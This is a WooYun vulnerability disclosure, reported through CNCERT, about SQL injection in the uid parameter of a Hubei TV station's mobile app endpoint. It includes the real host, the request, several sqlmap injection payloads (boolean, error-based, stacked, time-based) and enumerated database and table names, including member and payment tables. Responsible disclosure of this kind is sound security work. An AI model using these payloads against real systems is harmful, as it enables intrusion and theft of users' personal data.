当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090771

漏洞标题:湖北电视台某官方应用SQL注入可致大量会员信息泄露

相关厂商:湖北电视台

漏洞作者: kydhzy

提交时间:2015-01-09 12:37

修复时间:2015-02-23 12:38

公开时间:2015-02-23 12:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-14: 厂商已经确认,细节仅向厂商公开
2015-01-24: 细节向核心白帽子及相关领域专家公开
2015-02-03: 细节向普通白帽子公开
2015-02-13: 细节向实习白帽子公开
2015-02-23: 细节向公众公开

简要描述:

每天晚上看电视 ,电视里播的 ,乌云肯定要有啊

详细说明:

先看图吧

4.jpg


3.jpg


2.jpg


1.jpg


湖北经视官方应用 经视摇摇乐手机app 发现存在注入

GET /mobile/memberMsg/getMsg?uid=108514 HTTP/1.1
Host: mylive.moyuntv.com
Proxy-Connection: keep-alive
Referer: http://mylive.moyuntv.com/html/wap/userMsg.html
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; I318_T3 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: SERVERID=22115a7fc2c2cdf4460032a2809aff4a|1420720839|1420720839


漏洞证明:

GET /mobile/memberMsg/getMsg?uid=108514 HTTP/1.1
Host: mylive.moyuntv.com
Proxy-Connection: keep-alive
Referer: http://mylive.moyuntv.com/html/wap/userMsg.html
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; I318_T3 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: SERVERID=22115a7fc2c2cdf4460032a2809aff4a|1420720839|1420720839
此包存在注入
Place: GET
Parameter: uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=108514 AND 8100=8100
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=108514 AND (SELECT 2922 FROM(SELECT COUNT(*),CONCAT(0x3a646a67
a,(SELECT (CASE WHEN (2922=2922) THEN 1 ELSE 0 END)),0x3a726a723a,FLOOR(RAND(0)
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: uid=108514; SELECT SLEEP(5);--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=108514 AND SLEEP(5)
---
[20:54:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5.0
[20:54:14] [INFO] fetching current user
[20:54:14] [INFO] retrieved: operlive@%
current user:    'operlive@%'
[20:54:14] [INFO] fetching database names
[20:54:15] [INFO] the SQL query used returns 7 entries
[20:54:15] [INFO] retrieved: information_schema
[20:54:15] [INFO] retrieved: hm_live
[20:54:15] [INFO] retrieved: hm_live_perinstall
[20:54:15] [INFO] retrieved: my_ad
[20:54:15] [INFO] retrieved: my_score
[20:54:15] [INFO] retrieved: mysql
[20:54:15] [INFO] retrieved: performance_schema
available databases [7]:
[*] hm_live
[*] hm_live_perinstall
[*] information_schema
[*] my_ad
[*] my_score
[*] mysql
[*] performance_schema
其中hm_live_perinstall库就有134个表 其他的库你们看着办喽
you provided a HTTP Cookie header value. The target url provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] y
[22:02:52] [INFO] the SQL query used returns 134 entries
[22:02:52] [INFO] retrieved: hm_aca
[22:02:52] [INFO] retrieved: hm_activity
[22:02:52] [INFO] retrieved: hm_activity_apply
[22:02:52] [INFO] retrieved: hm_annunciate
[22:02:52] [INFO] retrieved: hm_app_recommend
[22:02:52] [INFO] retrieved: hm_app_recommend_stat
[22:02:53] [INFO] retrieved: hm_baoliao
[22:02:53] [INFO] retrieved: hm_c_activity
[22:02:53] [INFO] retrieved: hm_c_article
[22:02:53] [INFO] retrieved: hm_c_ecommerce
[22:02:53] [INFO] retrieved: hm_c_guess
[22:02:53] [INFO] retrieved: hm_c_link
[22:02:53] [INFO] retrieved: hm_c_localshop
[22:02:53] [INFO] retrieved: hm_c_pic
[22:02:53] [INFO] retrieved: hm_c_prize
[22:02:54] [INFO] retrieved: hm_c_q_answer
[22:02:54] [INFO] retrieved: hm_c_special
[22:02:54] [INFO] retrieved: hm_c_video
[22:02:54] [INFO] retrieved: hm_c_vote
[22:02:54] [INFO] retrieved: hm_card_type
[22:02:54] [INFO] retrieved: hm_cash_action
[22:02:54] [INFO] retrieved: hm_cash_log
[22:02:54] [INFO] retrieved: hm_cash_withdraw
[22:02:55] [INFO] retrieved: hm_catalog
[22:02:55] [INFO] retrieved: hm_catalog_purview
[22:02:55] [INFO] retrieved: hm_channel
[22:02:55] [INFO] retrieved: hm_channel_control
[22:02:55] [INFO] retrieved: hm_channel_prize
[22:02:55] [INFO] retrieved: hm_channel_program
[22:02:56] [INFO] retrieved: hm_channel_purview
[22:02:56] [INFO] retrieved: hm_channel_schedule
[22:02:56] [INFO] retrieved: hm_channel_type
[22:02:56] [INFO] retrieved: hm_com_app
[22:02:56] [INFO] retrieved: hm_com_app_version
[22:02:56] [INFO] retrieved: hm_com_apply
[22:02:56] [INFO] retrieved: hm_com_config
[22:02:56] [INFO] retrieved: hm_com_feedback
[22:02:57] [INFO] retrieved: hm_com_game
[22:02:57] [INFO] retrieved: hm_com_user
[22:02:57] [INFO] retrieved: hm_comment
[22:02:57] [INFO] retrieved: hm_company
[22:02:57] [INFO] retrieved: hm_config
[22:02:57] [INFO] retrieved: hm_config_copy
[22:02:57] [INFO] retrieved: hm_content
[22:02:57] [INFO] retrieved: hm_content_log
[22:02:57] [INFO] retrieved: hm_content_model
[22:02:58] [INFO] retrieved: hm_content_stat
[22:02:58] [INFO] retrieved: hm_content_status
[22:02:58] [INFO] retrieved: hm_coupons
[22:02:58] [INFO] retrieved: hm_dnamedia
[22:02:58] [INFO] retrieved: hm_ecommerce
[22:02:58] [INFO] retrieved: hm_egoods
[22:02:58] [INFO] retrieved: hm_form_option
[22:02:58] [INFO] retrieved: hm_form_type
[22:02:58] [INFO] retrieved: hm_game
[22:02:59] [INFO] retrieved: hm_game_copy
[22:02:59] [INFO] retrieved: hm_group
[22:02:59] [INFO] retrieved: hm_guess_log
[22:02:59] [INFO] retrieved: hm_guess_object
[22:02:59] [INFO] retrieved: hm_guess_option
[22:02:59] [INFO] retrieved: hm_info_content
[22:03:00] [INFO] retrieved: hm_info_type
[22:03:00] [INFO] retrieved: hm_interact
[22:03:00] [INFO] retrieved: hm_local_goods
[22:03:00] [INFO] retrieved: hm_login_log
[22:03:00] [INFO] retrieved: hm_lottery
[22:03:00] [INFO] retrieved: hm_lottery_code
[22:03:00] [INFO] retrieved: hm_lottery_log
[22:03:00] [INFO] retrieved: hm_lottery_type
[22:03:01] [INFO] retrieved: hm_manual_control_log
[22:03:01] [INFO] retrieved: hm_member
[22:03:01] [INFO] retrieved: hm_member_data
[22:03:01] [INFO] retrieved: hm_member_detail
[22:03:01] [INFO] retrieved: hm_member_findpwd
[22:03:01] [INFO] retrieved: hm_member_group
[22:03:01] [INFO] retrieved: hm_member_login_log
[22:03:01] [INFO] retrieved: hm_member_msg
[22:03:01] [INFO] retrieved: hm_member_score
[22:03:02] [INFO] retrieved: hm_member_thirdaccount
[22:03:02] [INFO] retrieved: hm_member_vest
[22:03:02] [INFO] retrieved: hm_menu
[22:03:02] [INFO] retrieved: hm_menu_copy
[22:03:02] [INFO] retrieved: hm_merchant_home
[22:03:02] [INFO] retrieved: hm_message
[22:03:02] [INFO] retrieved: hm_news_recommend
[22:03:02] [INFO] retrieved: hm_oplog
[22:03:03] [INFO] retrieved: hm_order
[22:03:03] [INFO] retrieved: hm_pay_callback_log
[22:03:03] [INFO] retrieved: hm_pic
[22:03:03] [INFO] retrieved: hm_plug_part
[22:03:03] [INFO] retrieved: hm_prize
[22:03:03] [INFO] retrieved: hm_prize_catalog
[22:03:04] [INFO] retrieved: hm_prize_exchange
[22:03:04] [INFO] retrieved: hm_prize_show_log
[22:03:04] [INFO] retrieved: hm_prize_type
[22:03:04] [INFO] retrieved: hm_prized_log
[22:03:04] [INFO] retrieved: hm_qa_log
[22:03:04] [INFO] retrieved: hm_qa_option
[22:03:04] [INFO] retrieved: hm_rank_user_num
[22:03:04] [INFO] retrieved: hm_recommend_home
[22:03:04] [INFO] retrieved: hm_recommend_type
[22:03:05] [INFO] retrieved: hm_report
[22:03:05] [INFO] retrieved: hm_role
[22:03:05] [INFO] retrieved: hm_role_aca
[22:03:05] [INFO] retrieved: hm_score_activity
[22:03:05] [INFO] retrieved: hm_score_log
[22:03:05] [INFO] retrieved: hm_score_rule
[22:03:05] [INFO] retrieved: hm_sensitive_word
[22:03:05] [INFO] retrieved: hm_sensitive_word_type
[22:03:06] [INFO] retrieved: hm_share_score_log
[22:03:06] [INFO] retrieved: hm_shop_seckill
[22:03:06] [INFO] retrieved: hm_shop_voucher_log
[22:03:06] [INFO] retrieved: hm_signin
[22:03:06] [INFO] retrieved: hm_site_share
[22:03:06] [INFO] retrieved: hm_sms
[22:03:06] [INFO] retrieved: hm_spchoujiang
[22:03:06] [INFO] retrieved: hm_spcomment
[22:03:06] [INFO] retrieved: hm_task
[22:03:07] [INFO] retrieved: hm_task_condition
[22:03:07] [INFO] retrieved: hm_task_log
[22:03:07] [INFO] retrieved: hm_task_prize_rand_log
[22:03:07] [INFO] retrieved: hm_task_restrictions_type
[22:03:07] [INFO] retrieved: hm_task_type
[22:03:07] [INFO] retrieved: hm_temp_lotterywin
[22:03:08] [INFO] retrieved: hm_terminal_info
[22:03:08] [INFO] retrieved: hm_topic__bak
[22:03:08] [INFO] retrieved: hm_unique_score
[22:03:08] [INFO] retrieved: hm_user_oplog
[22:03:08] [INFO] retrieved: hm_validate
[22:03:08] [INFO] retrieved: hm_video
[22:03:08] [INFO] retrieved: hm_vms_catalog_purview
[22:03:08] [INFO] retrieved: hm_vote_detail
[22:03:09] [INFO] retrieved: hm_vote_option
[22:03:09] [INFO] retrieved: hm_vote_stat
Database: hm_live_perinstall
[134 tables]
+---------------------------+
| hm_aca                    |
| hm_activity               |
| hm_activity_apply         |
| hm_annunciate             |
| hm_app_recommend          |
| hm_app_recommend_stat     |
| hm_baoliao                |
| hm_c_activity             |
| hm_c_article              |
| hm_c_ecommerce            |
| hm_c_guess                |
| hm_c_link                 |
| hm_c_localshop            |
| hm_c_pic                  |
| hm_c_prize                |
| hm_c_q_answer             |
| hm_c_special              |
| hm_c_video                |
| hm_c_vote                 |
| hm_card_type              |
| hm_cash_action            |
| hm_cash_log               |
| hm_cash_withdraw          |
| hm_catalog                |
| hm_catalog_purview        |
| hm_channel                |
| hm_channel_control        |
| hm_channel_prize          |
| hm_channel_program        |
| hm_channel_purview        |
| hm_channel_schedule       |
| hm_channel_type           |
| hm_com_app                |
| hm_com_app_version        |
| hm_com_apply              |
| hm_com_config             |
| hm_com_feedback           |
| hm_com_game               |
| hm_com_user               |
| hm_comment                |
| hm_company                |
| hm_config                 |
| hm_config_copy            |
| hm_content                |
| hm_content_log            |
| hm_content_model          |
| hm_content_stat           |
| hm_content_status         |
| hm_coupons                |
| hm_dnamedia               |
| hm_ecommerce              |
| hm_egoods                 |
| hm_form_option            |
| hm_form_type              |
| hm_game                   |
| hm_game_copy              |
| hm_group                  |
| hm_guess_log              |
| hm_guess_object           |
| hm_guess_option           |
| hm_info_content           |
| hm_info_type              |
| hm_interact               |
| hm_local_goods            |
| hm_login_log              |
| hm_lottery                |
| hm_lottery_code           |
| hm_lottery_log            |
| hm_lottery_type           |
| hm_manual_control_log     |
| hm_member                 |
| hm_member_data            |
| hm_member_detail          |
| hm_member_findpwd         |
| hm_member_group           |
| hm_member_login_log       |
| hm_member_msg             |
| hm_member_score           |
| hm_member_thirdaccount    |
| hm_member_vest            |
| hm_menu                   |
| hm_menu_copy              |
| hm_merchant_home          |
| hm_message                |
| hm_news_recommend         |
| hm_oplog                  |
| hm_order                  |
| hm_pay_callback_log       |
| hm_pic                    |
| hm_plug_part              |
| hm_prize                  |
| hm_prize_catalog          |
| hm_prize_exchange         |
| hm_prize_show_log         |
| hm_prize_type             |
| hm_prized_log             |
| hm_qa_log                 |
| hm_qa_option              |
| hm_rank_user_num          |
| hm_recommend_home         |
| hm_recommend_type         |
| hm_report                 |
| hm_role                   |
| hm_role_aca               |
| hm_score_activity         |
| hm_score_log              |
| hm_score_rule             |
| hm_sensitive_word         |
| hm_sensitive_word_type    |
| hm_share_score_log        |
| hm_shop_seckill           |
| hm_shop_voucher_log       |
| hm_signin                 |
| hm_site_share             |
| hm_sms                    |
| hm_spchoujiang            |
| hm_spcomment              |
| hm_task                   |
| hm_task_condition         |
| hm_task_log               |
| hm_task_prize_rand_log    |
| hm_task_restrictions_type |
| hm_task_type              |
| hm_temp_lotterywin        |
| hm_terminal_info          |
| hm_topic__bak             |
| hm_unique_score           |
| hm_user_oplog             |
| hm_validate               |
| hm_video                  |
| hm_vms_catalog_purview    |
| hm_vote_detail            |
| hm_vote_option            |
| hm_vote_stat              |
+---------------------------+
未进一步深入

修复方案:

你懂的

版权声明:转载请注明来源 kydhzy@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-01-14 11:15

厂商回复:

最新状态:

暂无